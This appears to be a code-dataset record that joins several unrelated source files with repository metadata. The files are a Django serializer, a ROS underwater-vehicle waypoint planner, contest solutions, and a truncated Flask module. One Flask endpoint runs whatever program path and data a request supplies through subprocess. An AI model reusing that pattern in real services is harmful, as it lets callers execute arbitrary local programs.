# queryset = HeritageSiteJurisdiction.objects \
# .values_list('country_area_id', flat=True) \
# .filter(heritage_site = obj) \
# .order_by('country_area_id')
return [HeritageSiteJurisdictionSerializer(hsj).data for hsj in queryset]
'''
def create(self, validated_data):
"""
This method persists a new HeritageSite instance as well as adds all related
countries/areas to the heritage_site_jurisdiction table. It does so by first
removing (validated_data.pop('heritage_site_jurisdiction')) from the validated
data before the new HeritageSite instance is saved to the database. It then loops
over the heritage_site_jurisdiction array in order to extract each country_area_id
element and add entries to junction/associative heritage_site_jurisdiction table.
:param validated_data:
:return: site
"""
# print(validated_data)
countries = validated_data.pop('heritage_site_jurisdiction')
site = HeritageSite.objects.create(**validated_data)
if countries is not None:
for country in countries:
HeritageSiteJurisdiction.objects.create(
heritage_site_id=site.heritage_site_id,
country_area_id=country.country_area_id
)
return site
def update(self, instance, validated_data):
# site_id = validated_data.pop('heritage_site_id')
site_id = instance.heritage_site_id
new_countries = validated_data.pop('heritage_site_jurisdiction')
instance.site_name = validated_data.get(
'site_name',
instance.site_name
)
instance.description = validated_data.get(
'description',
instance.description
)
instance.justification = validated_data.get(
'justification',
instance.justification
)
instance.date_inscribed = validated_data.get(
'date_inscribed',
instance.date_inscribed
)
instance.longitude = validated_data.get(
'longitude',
instance.longitude
)
instance.latitude = validated_data.get(
'latitude',
instance.latitude
)
instance.area_hectares = validated_data.get(
'area_hectares',
instance.area_hectares
)
instance.heritage_site_category_id = validated_data.get(
'heritage_site_category_id',
instance.heritage_site_category_id
)
instance.transboundary = validated_data.get(
'transboundary',
instance.transboundary
)
instance.save()
# If any existing country/areas are not in updated list, delete them
new_ids = []
old_ids = HeritageSiteJurisdiction.objects \
.values_list('country_area_id', flat=True) \
.filter(heritage_site_id__exact=site_id)
# TODO Insert may not be required (Just return instance)
# Insert new unmatched country entries
for country in new_countries:
new_id = country.country_area_id
new_ids.append(new_id)
if new_id in old_ids:
continue
else:
HeritageSiteJurisdiction.objects \
.create(heritage_site_id=site_id, country_area_id=new_id)
# Delete old unmatched country entries
for old_id in old_ids:
if old_id in new_ids:
continue
else:
HeritageSiteJurisdiction.objects \
.filter(heritage_site_id=site_id, country_area_id=old_id) \
.delete()
return instance
| 1,889 | 4,844 | 230 |
e23c6a492715258836584b050d10ded1372f53ed | 17,270 | py | Python | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | auv_simple_motion_planner/scripts/wp_depth_action_planner.py | Jollerprutt/smarc_missions | dd431c82400315c0ebd3d2b8e185f0b94ee9d3e8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
if __name__ == '__main__':
rospy.init_node('wp_depth_action_planner')
planner = WPDepthPlanner(rospy.get_name())
| 45.809019 | 757 | 0.666589 | #!/usr/bin/python
# Copyright 2018 Nils Bore, Sriharsha Bhat (nbore@kth.se, svbhat@kth.se)
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseStamped, PointStamped
from move_base_msgs.msg import MoveBaseFeedback, MoveBaseResult, MoveBaseAction
import actionlib
import rospy
import tf
from sam_msgs.msg import ThrusterRPMs, ThrusterAngles
from std_msgs.msg import Float64, Header, Bool
import math
from visualization_msgs.msg import Marker
from tf.transformations import quaternion_from_euler
class WPDepthPlanner(object):
# create messages that are used to publish feedback/result
_feedback = MoveBaseFeedback()
_result = MoveBaseResult()
def create_marker(self, yaw_setpoint, depth_setpoint):
self.marker.header.frame_id = "/sam/odom"
self.marker.header.stamp = rospy.Time(0)
self.marker.ns = "/sam/viz"
self.marker.id = 0
self.marker.type = 0
self.marker.action = 0
self.marker.pose.position.x = self._feedback.base_position.pose.position.x
self.marker.pose.position.y = self._feedback.base_position.pose.position.y
self.marker.pose.position.z = self._feedback.base_position.pose.position.z
q = quaternion_from_euler(0,0,yaw_setpoint)
self.marker.pose.orientation.x = q[0]
self.marker.pose.orientation.y = q[1]
self.marker.pose.orientation.z = q[2]
self.marker.pose.orientation.w = q[3]
self.marker.scale.x = 1
self.marker.scale.y = 0.1
self.marker.scale.z = 0.1
self.marker.color.a = 1.0 # Dont forget to set the alpha!
self.marker.color.r = 1.0
self.marker.color.g = 1.0
self.marker.color.b = 1.0
self.marker_pub.publish(self.marker)
def yaw_feedback_cb(self,yaw_feedback):
self.yaw_feedback= yaw_feedback.data
def angle_wrap(self,angle):
if(abs(angle)>3.141516):
angle= angle - (abs(angle)/angle)*2*3.141516; #Angle wrapping between -pi and pi
rospy.loginfo_throttle_identical(20, "Angle Error Wrapped")
return angle
def turbo_turn(self,angle_error):
rpm = self.turbo_turn_rpm
rudder_angle = self.rudder_angle
flip_rate = self.flip_rate
left_turn = True
#left turn increases value of yaw angle towards pi, right turn decreases it towards -pi.
if angle_error < 0:
left_turn = False
rospy.loginfo('Right turn!')
rospy.loginfo('Turbo Turning!')
if left_turn:
rudder_angle = -rudder_angle
thrust_rate = 11.
rate = rospy.Rate(thrust_rate)
self.vec_pub.publish(0., rudder_angle, Header())
loop_time = 0.
while not rospy.is_shutdown() and loop_time < .5/flip_rate:
self.rpm_pub.publish(rpm, rpm, Header())
loop_time += 1./thrust_rate
rate.sleep()
self.vec_pub.publish(0., -rudder_angle, Header())
loop_time = 0.
while not rospy.is_shutdown() and loop_time < .5/flip_rate:
self.rpm_pub.publish(-rpm, -rpm, Header())
loop_time += 1./thrust_rate
rate.sleep()
def execute_cb(self, goal):
rospy.loginfo("Goal received")
success = True
self.nav_goal = goal.target_pose.pose
self.nav_goal_frame = goal.target_pose.header.frame_id
if self.nav_goal_frame is None or self.nav_goal_frame == '':
rospy.logwarn("Goal has no frame id! Using utm by default")
self.nav_goal_frame = 'utm'
goal_point = PointStamped()
goal_point.header.frame_id = self.nav_goal_frame
goal_point.header.stamp = rospy.Time(0)
goal_point.point.x = self.nav_goal.position.x
goal_point.point.y = self.nav_goal.position.y
goal_point.point.z = self.nav_goal.position.z
try:
goal_point_local = self.listener.transformPoint(self.nav_goal_frame, goal_point)
self.nav_goal.position.x = goal_point_local.point.x
self.nav_goal.position.y = goal_point_local.point.y
self.nav_goal.position.z = goal_point_local.point.z
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
print ("Not transforming point to world local")
pass
rospy.loginfo('Nav goal in local %s ' % self.nav_goal.position.x)
r = rospy.Rate(11.) # 10hz
counter = 0
while not rospy.is_shutdown() and self.nav_goal is not None:
self.yaw_pid_enable.publish(True)
self.depth_pid_enable.publish(True)
# Preempted
if self._as.is_preempt_requested():
rospy.loginfo('%s: Preempted' % self._action_name)
success = False
self.nav_goal = None
# Stop thrusters
rpm = ThrusterRPMs()
rpm.thruster_1_rpm = 0.
rpm.thruster_2_rpm = 0.
self.rpm_pub.publish(rpm)
self.yaw_pid_enable.publish(False)
self.depth_pid_enable.publish(False)
self.vbs_pid_enable.publish(False)
self.vel_pid_enable.publish(False)
print('wp depth action planner: stopped thrusters')
self._as.set_preempted(self._result, "Preempted WP action")
return
# Publish feedback
if counter % 5 == 0:
try:
(trans, rot) = self.listener.lookupTransform(self.nav_goal_frame, self.base_frame, rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo("Error with tf:"+str(self.nav_goal_frame) + " to "+str(self.base_frame))
continue
pose_fb = PoseStamped()
pose_fb.header.frame_id = self.nav_goal_frame
pose_fb.pose.position.x = trans[0]
pose_fb.pose.position.y = trans[1]
pose_fb.pose.position.z = trans[2]
self._feedback.base_position = pose_fb
self._feedback.base_position.header.stamp = rospy.get_rostime()
self._as.publish_feedback(self._feedback)
#rospy.loginfo("Sending feedback")
#Compute yaw setpoint.
xdiff = self.nav_goal.position.x - pose_fb.pose.position.x
ydiff = self.nav_goal.position.y - pose_fb.pose.position.y
yaw_setpoint = math.atan2(ydiff,xdiff)
print('xdiff:',xdiff,'ydiff:',ydiff,'yaw_setpoint:',yaw_setpoint)
#compute yaw_error (e.g. for turbo_turn)
yaw_error= -(self.yaw_feedback - yaw_setpoint)
yaw_error= self.angle_wrap(yaw_error) #wrap angle error between -pi and pi
depth_setpoint = self.nav_goal.position.z
self.depth_pub.publish(depth_setpoint)
#self.vbs_pid_enable.publish(False)
#self.vbs_pub.publish(depth_setpoint)
if self.vel_ctrl_flag:
rospy.loginfo_throttle_identical(5, "vel ctrl, no turbo turn")
#with Velocity control
self.yaw_pid_enable.publish(True)
self.yaw_pub.publish(yaw_setpoint)
# Publish to velocity controller
self.vel_pid_enable.publish(True)
self.vel_pub.publish(self.vel_setpoint)
self.roll_pub.publish(self.roll_setpoint)
#rospy.loginfo("Velocity published")
else:
if self.turbo_turn_flag:
#if turbo turn is included
rospy.loginfo("Yaw error: %f", yaw_error)
if abs(yaw_error) > self.turbo_angle_min and abs(yaw_error) < self.turbo_angle_max:
#turbo turn with large deviations, maximum deviation is 3.0 radians to prevent problems with discontinuities at +/-pi
self.yaw_pid_enable.publish(False)
self.turbo_turn(yaw_error)
self.depth_pid_enable.publish(False)
self.vbs_pid_enable.publish(True)
self.vbs_pub.publish(depth_setpoint)
else:
rospy.loginfo_throttle_identical(5,"Normal WP following")
#normal turning if the deviation is small
self.vbs_pid_enable.publish(False)
self.depth_pid_enable.publish(True)
self.yaw_pid_enable.publish(True)
self.yaw_pub.publish(yaw_setpoint)
self.create_marker(yaw_setpoint,depth_setpoint)
# Thruster forward
rpm = ThrusterRPMs()
rpm.thruster_1_rpm = self.forward_rpm
rpm.thruster_2_rpm = self.forward_rpm
self.rpm_pub.publish(rpm)
#rospy.loginfo("Thrusters forward")
else:
#turbo turn not included, no velocity control
rospy.loginfo_throttle_identical(5, "Normal WP following, no turbo turn")
self.yaw_pid_enable.publish(True)
self.yaw_pub.publish(yaw_setpoint)
self.create_marker(yaw_setpoint,depth_setpoint)
# Thruster forward
rpm = ThrusterRPMs()
rpm.thruster_1_rpm = self.forward_rpm
rpm.thruster_2_rpm = self.forward_rpm
self.rpm_pub.publish(rpm)
#rospy.loginfo("Thrusters forward")
counter += 1
r.sleep()
# Stop thruster
self.vel_pid_enable.publish(False)
rpm = ThrusterRPMs()
rpm.thruster_1_rpm = 0.0
rpm.thruster_2_rpm = 0.0
self.rpm_pub.publish(rpm)
#Stop controllers
self.yaw_pid_enable.publish(False)
self.depth_pid_enable.publish(False)
self.vbs_pid_enable.publish(False)
self.vel_pid_enable.publish(False)
rospy.loginfo('%s: Succeeded' % self._action_name)
self._as.set_succeeded(self._result)
def timer_callback(self, event):
if self.nav_goal is None:
#rospy.loginfo_throttle(30, "Nav goal is None!")
return
try:
(trans, rot) = self.listener.lookupTransform(self.nav_goal_frame, self.base_frame, rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
return
# TODO: we could use this code for the other check also
goal_point = PointStamped()
goal_point.header.frame_id = self.nav_goal_frame
goal_point.header.stamp = rospy.Time(0)
goal_point.point.x = self.nav_goal.position.x
goal_point.point.y = self.nav_goal.position.y
goal_point.point.z = self.nav_goal.position.z
#print("Checking if nav goal is reached!")
start_pos = np.array(trans)
end_pos = np.array([self.nav_goal.position.x, self.nav_goal.position.y, self.nav_goal.position.z])
# We check for success out of the main control loop in case the main control loop is
# running at 300Hz or sth. like that. We dont need to check succes that frequently.
xydiff = start_pos[:2] - end_pos[:2]
zdiff = np.abs(np.abs(start_pos[2]) - np.abs(end_pos[2]))
xydiff_norm = np.linalg.norm(xydiff)
rospy.logdebug("diff xy:"+ str(xydiff_norm)+' z:' + str(zdiff))
if xydiff_norm < self.wp_tolerance and zdiff < self.depth_tolerance:
rospy.loginfo("Reached goal!")
self.nav_goal = None
def __init__(self, name):
"""Publish yaw and depth setpoints based on waypoints"""
self._action_name = name
#self.heading_offset = rospy.get_param('~heading_offsets', 5.)
self.wp_tolerance = rospy.get_param('~wp_tolerance', 5.)
self.depth_tolerance = rospy.get_param('~depth_tolerance', 0.5)
self.base_frame = rospy.get_param('~base_frame', "sam/base_link")
rpm_cmd_topic = rospy.get_param('~rpm_cmd_topic', '/sam/core/rpm_cmd')
heading_setpoint_topic = rospy.get_param('~heading_setpoint_topic', '/sam/ctrl/dynamic_heading/setpoint')
yaw_pid_enable_topic = rospy.get_param('~yaw_pid_enable_topic', '/sam/ctrl/dynamic_heading/pid_enable')
depth_setpoint_topic = rospy.get_param('~depth_setpoint_topic', '/sam/ctrl/dynamic_depth/setpoint')
depth_pid_enable_topic = rospy.get_param('~depth_pid_enable_topic', '/sam/ctrl/dynamic_depth/pid_enable')
self.forward_rpm = int(rospy.get_param('~forward_rpm', 1000))
#related to turbo turn
self.turbo_turn_flag = rospy.get_param('~turbo_turn_flag', False)
thrust_vector_cmd_topic = rospy.get_param('~thrust_vector_cmd_topic', '/sam/core/thrust_vector_cmd')
yaw_feedback_topic = rospy.get_param('~yaw_feedback_topic', '/sam/ctrl/yaw_feedback')
self.turbo_angle_min_deg = rospy.get_param('~turbo_angle_min', 90)
self.turbo_angle_min = np.radians(self.turbo_angle_min_deg)
self.turbo_angle_max = 3.0
self.flip_rate = rospy.get_param('~flip_rate', 0.5)
self.rudder_angle = rospy.get_param('~rudder_angle', 0.08)
self.turbo_turn_rpm = rospy.get_param('~turbo_turn_rpm', 1000)
vbs_pid_enable_topic = rospy.get_param('~vbs_pid_enable_topic', '/sam/ctrl/vbs/pid_enable')
vbs_setpoint_topic = rospy.get_param('~vbs_setpoint_topic', '/sam/ctrl/vbs/setpoint')
#related to velocity regulation instead of rpm
self.vel_ctrl_flag = rospy.get_param('~vel_ctrl_flag', False)
self.vel_setpoint = rospy.get_param('~vel_setpoint', 0.5) #velocity setpoint in m/s
self.roll_setpoint = rospy.get_param('~roll_setpoint', 0)
vel_setpoint_topic = rospy.get_param('~vel_setpoint_topic', '/sam/ctrl/dynamic_velocity/u_setpoint')
roll_setpoint_topic = rospy.get_param('~roll_setpoint_topic', '/sam/ctrl/dynamic_velocity/roll_setpoint')
vel_pid_enable_topic = rospy.get_param('~vel_pid_enable_topic', '/sam/ctrl/dynamic_velocity/pid_enable')
self.nav_goal = None
self.listener = tf.TransformListener()
rospy.Timer(rospy.Duration(0.5), self.timer_callback)
self.yaw_feedback=0
rospy.Subscriber(yaw_feedback_topic, Float64, self.yaw_feedback_cb)
self.rpm_pub = rospy.Publisher(rpm_cmd_topic, ThrusterRPMs, queue_size=10)
self.yaw_pub = rospy.Publisher(heading_setpoint_topic, Float64, queue_size=10)
self.depth_pub = rospy.Publisher(depth_setpoint_topic, Float64, queue_size=10)
self.vel_pub = rospy.Publisher(vel_setpoint_topic, Float64, queue_size=10)
self.roll_pub = rospy.Publisher(roll_setpoint_topic, Float64, queue_size=10)
#TODO make proper if it works.
self.vbs_pub = rospy.Publisher(vbs_setpoint_topic, Float64, queue_size=10)
self.yaw_pid_enable = rospy.Publisher(yaw_pid_enable_topic, Bool, queue_size=10)
self.depth_pid_enable = rospy.Publisher(depth_pid_enable_topic, Bool, queue_size=10)
self.vbs_pid_enable = rospy.Publisher(vbs_pid_enable_topic, Bool, queue_size=10)
self.vel_pid_enable = rospy.Publisher(vel_pid_enable_topic, Bool, queue_size=10)
self.vec_pub = rospy.Publisher(thrust_vector_cmd_topic, ThrusterAngles, queue_size=10)
self.marker = Marker()
self.marker_pub = rospy.Publisher('/sam/viz/wp_marker', Marker, queue_size=1)
self._as = actionlib.SimpleActionServer(self._action_name, MoveBaseAction, execute_cb=self.execute_cb, auto_start = False)
self._as.start()
rospy.loginfo("Announced action server with name: %s", self._action_name)
rospy.spin()
if __name__ == '__main__':
rospy.init_node('wp_depth_action_planner')
planner = WPDepthPlanner(rospy.get_name())
| 10,698 | 4,335 | 23 |
4f1cf3c0ae52adf3586dbd9ace2922b02750dbca | 347 | py | Python | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | 2 | 2020-06-12T09:54:23.000Z | 2021-05-04T01:34:07.000Z | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | 961 | 2020-06-23T07:26:22.000Z | 2022-03-31T21:34:52.000Z | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | null | null | null | '''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
current_hour, add_hour = list(map(int, input().split()))
contest_hour = current_hour + add_hour
if contest_hour < 24:
print(contest_hour)
else:
print(contest_hour - 24)
| 15.086957 | 61 | 0.576369 | '''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
current_hour, add_hour = list(map(int, input().split()))
contest_hour = current_hour + add_hour
if contest_hour < 24:
print(contest_hour)
else:
print(contest_hour - 24)
| 0 | 0 | 0 |
a0af9bffe8473b6c0d6be526c0dc67a6cfca8472 | 1,296 | py | Python | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | '''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
| 23.563636 | 256 | 0.471451 | '''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
class Solution(object):
def numIslands(self, grid):
"""
:type grid: List[List[str]]
:rtype: int
"""
res = 0
if not grid:
return res
for i in xrange(len(grid)):
for j in xrange(len(grid[i])):
if grid[i][j] == '1':
res += 1
self.fill(grid, i, j)
return res
def fill(self, grid, x, y):
vec = [(x, y)]
while len(vec) > 0:
tmpx, tmpy = vec.pop()
grid[tmpx][tmpy] = '0'
for i, j in [(1, 0), (-1, 0), (0, 1), (0, -1)]:
tmpxx = tmpx + i
tmpyy = tmpy + j
if 0 <= tmpxx < len(grid) and 0 <= tmpyy < len(grid[tmpxx]):
if grid[tmpxx][tmpyy] == '1':
vec.append((tmpxx, tmpyy))
| 431 | 446 | 23 |
b9a37f549a9f2cd296ab398602fda182177dac33 | 24,050 | py | Python | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
"""
自定义redis列表增量迭代
:param name: redis中的name,即:迭代name对应的列表
:return: yield 返回 列表元素
"""
list_count = r.llen(name)
for index in range(list_count):
yield r.lindex(name, index)
#}}}
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
# }}}
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
# }}}
#=======================================================
# 提供使用者生成下載檔案列表之id & pwd (gen_salt)
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案功能之id & pwd合法性
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案的有效期限若超過則刪除
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
#}}}
#=======================================================
# 提供api觸發指定程式
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
#{{{APIINFO
'''
{
"API_application":"提供觸發指定程式",
"API_parameters":{"uid":"使用者帳號"},
"API_path_parameters":{"SYSTEM":"合法的系統名稱"},
"API_postData":{
"bodytype":"Object",
"bodyschema":"{}",
"parameters":{
"languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
"programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
"programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
},
"precautions":{
"注意事項1":"languages目前只接受php語言",
"注意事項2":"programName程式路徑必須存在"
},
"example":[
{
"languages":"php",
"programName":"test.php",
"programData":"123"
}
]
},
"API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
"API_example":{
"Response": "ok",
"APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
"OperationTime": "3.020",
"BytesTransferred": 223,
"System": "IOT",
"GetProgramResponse": "test"
}
}
'''
#}}}
err_msg = "error"
languages_config = {
"php":"/usr/bin/php",
"c":""
}
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
# if SYSTEM not in list(set(globalvar.SYSTEMLIST[globalvar.SERVERIP]).intersection(set(ACCESS_SYSTEM_LIST))):
# dicRet["Response"] = "system:{} has no privillege to use this API".format(SYSTEM)
# return jsonify( **dicRet)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
if not VerifyDataStrLawyer(request.data).verify_json():
dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
return jsonify( **dicRet)
reqdataDict = json.loads(request.data)
if isinstance(reqdataDict,type(u"")):
reqdataDict = json.loads(reqdataDict)
post_parameter = ["languages","programName","programData"]
if not check_post_parameter_exist(reqdataDict,post_parameter):
dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
return jsonify( **dicRet)
languages = reqdataDict.get("languages")
programName = reqdataDict.get("programName")
programData = reqdataDict.get("programData")
# print "~~~~languages~~~~"
# print languages
if languages not in languages_config.keys():
dicRet["Response"] = "Currently only php and C programs can be executed"
return jsonify( **dicRet)
# print "~~~~programName~~~~"
# print programName
# print "~~~~programData~~~~"
# print programData
# print type(programData)
if isinstance(programData,dict): programData = json.dumps(programData)
# print "~~~~programData~~~~"
# print programData
if not os.path.isfile(programName):
dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
return jsonify( **dicRet)
cmd = [languages_config[languages],programName]
if programData: cmd.append(programData)
# cmd = "{}{}".format(languages_config[languages],programName)
# if programData: cmd+=" '{}'".format(programData)
# print "~~~cmd~~~"
# print cmd
try:
if useThread:
# print "~~~~~trigger start~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
if Temp:
from celeryApp.celeryTasks import celery_trigger_specific_program
celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
else:
worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
worker.start()
